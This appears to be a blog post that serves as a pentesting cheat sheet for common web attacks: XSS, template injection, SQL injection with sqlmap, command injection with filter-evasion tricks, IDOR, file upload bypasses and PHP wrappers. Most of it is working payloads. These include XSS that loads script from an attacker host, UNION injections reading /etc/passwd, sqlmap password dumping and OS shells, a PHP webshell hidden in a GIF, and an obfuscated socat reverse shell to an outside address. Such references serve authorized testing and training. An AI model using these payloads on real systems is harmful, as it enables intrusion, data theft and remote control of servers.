Home Pentesting - Common Attacks
Post
Cancel

Pentesting - Common Attacks

XSS

PoC:

1
<script>alert("hola");</script>
1
<script>alert(document.cookie);</script>
1
<img src="" onerror=alert(window.origin)>

Basic payloads:

1
2
3
4
5
<script>alert('XSS')</script>
<scr<script>ipt>alert('XSS')</scr<script>ipt>
"><script>alert('XSS')</script>
"><script>alert(String.fromCharCode(88,83,83))</script>
<script src="http://<LHOST>/<FILE>"></script>

More information and examples:

Automatic tools for discovery XSS vulnerabilities

https://github.com/s0md3v/XSStrike

Example:

1
python xsstrike.py -u "http://SERVER_IP:PORT/index.php?task=test"

https://github.com/rajeshmajumdar/BruteXSS https://github.com/epsylon/xsser

SSTI (Server Side Template Injection)

A server-side template injection occurs when an attacker is able to use native template syntax to inject a malicious payload into a template, which is then executed server-side.

Example:

1
http://vulnerable-website.com/?name=

Detect - Plaintext context:

1
2
3
4
5
6
7
8
${7*7}

<%= 7*7 %>

#{7*7}

*{7*7}

SQLi (SQL injection)

Automatic tool for SQLi - SQLmap

https://github.com/sqlmapproject/sqlmap

It can proof if the parameter is vulnerable to SQL injection.

Example:

1
python sqlmap.py -u "http://<IP>/section.php?id=51" --batch

The option ‘-u’ is used to provide the target URL, while the switch ‘–batch’ is used for skipping any required user-input, by automatically choosing using the default option.

There are some interesting flags that can be useful.

Basic DB Data Enumeration:

1
--banner --current-user --current-db --is-dba

To get the database list:

1
--dbs

To find out what tables exist in a particular database:

1
--tables -D <databaseName>

To find columns of the table:

1
--columns -D <databaseName> -T <tableName>

Extracting the data from the table:

1
--dump -D <databaseName> -T <tableName>

Example GET/POST Requests:

1
--data '<parameterName=value&parameterName=value>'

Also, if we wanted to specify an alternative HTTP method, other than GET and POST (e.g., PUT), we can utilize the option --method, as follows:

1
--data='<parameter=value>' --method <method>

Full HTTP Requests: If we need to specify a complex HTTP request with lots of different header values and an elongated POST body, we can use the -r flag. With this option, SQLMap is provided with the “request file,” containing the whole HTTP request inside a single textual file. In a common scenario, such HTTP request can be captured from within a specialized proxy application (e.g. Burpsuite) and written into the request file. We can either manually copy the HTTP request from within Burpsuite and write it to a file, or we can right-click the request within Burp and choose Copy to file.

1
sqlmap -r <fileRequest.txt>

Database schema enumeration:

1
--schema

Password enumeration and cracking:

1
--passwords --batch

Searching for data:

1
--search -T <string>

Checking for DBA Privileges

1
--is-dba

If current user is DBA: False, meaning that we do not have DBA access. If current user is DBA: True, meaning that we may have the privilege to read local files.

Reading a local file:

1
--file-read "<fileName>"

Spawing an OS shell:

1
--os-shell

Writing Local Files:

1
--file-write "<nameFile>" --file-dest "<nameFile>"

If a shell can be uploaded, we can do an RCE attack. For example:

1
curl http://www.example.com/shell.php?cmd=ls+-la

Automatic tool for SQLi - Burpsuite (Intruder)

Manual SQLi Attack Testing

Entry point detection:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
'

"

`

')

")

`)

'))

"))

`))

%27

%22

#

%23

;

%3B

)

Comments:

  • MySQL
1
2
3
4
5
6
7
#comment

-- comment

/*comment*/

/*! MYSQL Special SQL */
  • PostgreSQL
1
2
3
--comment

/*comment*/
  • Oracle and SQLite
1
--coment

More info and examples about bypass:

Example - Read local file:

1
cn' UNION SELECT 1, LOAD_FILE("/etc/passwd"), 3, 4-- -

Example - Find current user:

1
cn' UNION SELECT 1, user(), 3, 4-- -

Example - Current database name:

1
cn' UNION select 1,database(),2,3-- -

RCE (Remote Code Execution)

There are various ways to perform RCE attacks, for example:

Concatenating Multiple Commands with ‘;’. Example:

1
ping -c 1 127.0.0.1; whoami

Example with AND operator:

1
ping -c 1 127.0.0.1 && whoami
1
ping -c 1 127.0.0.1 AND whoami

Example with OR operator:

1
ping -c 1 127.0.0.1 || whoami

Example in a POST request:

1
<parameter>=||+whoami

Sometimes the commands can be union with + or url encode or other methods.

Using Brace Expansion

There are many other methods we can utilize to bypass space filters. For example, we can use the Bash Brace Expansion feature, which automatically adds spaces between arguments wrapped between braces, as follows:

1
{ls,-la}

Example RCE: (127.0.0.1%0a{ls,-la}).

The parameter %0a is a space.

Bypassing other blacklisted characters

Besides injection operators and space characters, a very commonly blacklisted character is the slash (/) or backslash (\) character, as it is necessary to specify directories in Linux or Windows. We can utilize several techniques to produce any character we want while avoiding the use of blacklisted characters.

  • Linux

There are many techniques we can utilize to have slashes in our payload. One such technique we can use for replacing slashes (or any other character) is through Linux Environment Variables like ${IFS}. While ${IFS} is directly replaced with a space, there’s no such environment variable for slashes or semi-colons. However, these characters may be used in an environment variable, and we can specify start and length of our string to exactly match this character.

1
echo ${LS_COLORS:10:1}

Example RCE: 127.0.0.1${LS_COLORS:10:1}${IFS}

  • Linux and Windows

Other way is the obfuscation technique, for example:

1
w'h'o'a'mi

or:

1
w"h"o"a"mi

or:

1
w\h\o\ami

or:

1
wh^oami

or:

1
whoAmi

Example RCE: 127.0.0.1%0aw'h'o'a'mi

  • Reversed comands

Another command obfuscation technique is reversing commands and having a command template that switches them back and executes them in real-time. In this case, we will be writing imaohw instead of whoami to avoid triggering the blacklisted command.

Example:

1
echo 'whoami' | rev
1
$(rev<<<'imaohw')

Example RCE: 127.0.0.1%0a$(rev<<<'imaohw')

  • Encoded commands

Example:

1
echo -n 'cat /etc/passwd | grep 33' | base64
1
bash<<<$(base64 -d<<<IYIQGEhjkwe==)

Example RCE: 127.0.0.1%0abash<<<$(base64 -d<<<IYIQGEhjkwe==)

Interesting codes:

Using tabs instead of spaces:

1
%09

Will be replaced with a space and a tab:

1
${IFS}

Commas will be replaced with spaces:

1
{ls,-la}

Character that will be replaced with ‘/’:

1
${PATH:0:1}

Character that will be replaced with ‘;’:

1
${LS_COLORS:10:1}

Example RCE attack with PHP

Upload a simple webshell with the following contents:

1
<?php system($_GET['cmd']); ?>
1
curl http://domain.com/uploads/shell.php?cmd=<command>

Example - Socat for reverse shell

Code:

1
socat TCP4:10.10.14.5:8443 EXEC:/bin/bash

Code:

1
/ping.php?ip=127.0.0.1%0a's'o'c'a't'${IFS}TCP4:10.10.14.15:8443${IFS}EXEC:bash

Example - Create a malicious image

Example reverse shell PHP into a GIF file:

1
user@domain$ echo 'GIF8<?php system($_GET["cmd"]); ?>' > shell.gif

IDOR (Insecure Direct Object References)

An Insecure Direct Object Reference (IDOR) occurs when it is possible to bypass and access unauthorized resources. For instance, using the URL http://IP/?id=100, if we modify the ‘id’ parameter, we can access information intended for other users. IDORs represent an authorization issue.

Example:

1
http://192.168.1.45/users?id=1

Then, the ID can be changed manually or automatically for example with BurpSuite (with the intruder) and the answer can be examined.

It can be done with ffuf. Example:

1
ffuf -w </path/to/values.txt> -u http://192.168.1.45/users?id=FUZZ

Python Library Hijacking

A Python code can be created to perform an RCE attack, for example:

1
2
3
4
5
6
#!/usr/bin/env python3

import os

id=os.system('id')
print(id)

If the user has execution permissions for ‘python3’ when running the ‘sudo -l’ command, the attack can be carried out as follows:

1
/usr/bin/python3 <fie.py>

File Inclusion

More info and examples in:

Tools LFI

  • https://github.com/D35m0nd142/LFISuite

  • https://github.com/OsandaMalith/LFiFreak

  • https://github.com/mzfr/liffy

XML External Entity (XXE) Injection

Automatic tool: https://github.com/enjoiz/XXEinjector

Bypass the client-side file type validations

Fuzzing extensions

Dictionary: https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/web-extensions.txt

Double extensions

Reverse double extensions

Dictionary double extensions: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Upload%20Insecure%20Files/Extension%20PHP/extensions.lst

Character Injection

  • %20
  • %0a
  • %00
  • %0d0a
  • /
  • .\
  • .
  • :

MIME-Type

 File Signature or Magic Bytes

PHP Wrappers

Example of create a reverse shell PHP to base64:

1
echo '<?php system($_GET["cmd"]); ?>' | base64

Insert it into a parameter:

1
http://<URL>?parameter=data://text/plain;base64,<codeBase64>&cmd=<command>

Download it and get the shell:

1
curl -s 'http://<URL>?parameter=data://text/plain;base64,<codeBase64>&cmd=<command>'

More Wrappers:

1
php://filter/read=convert.base64-encode/recource=config
This post is licensed under CC BY 4.0 by the author.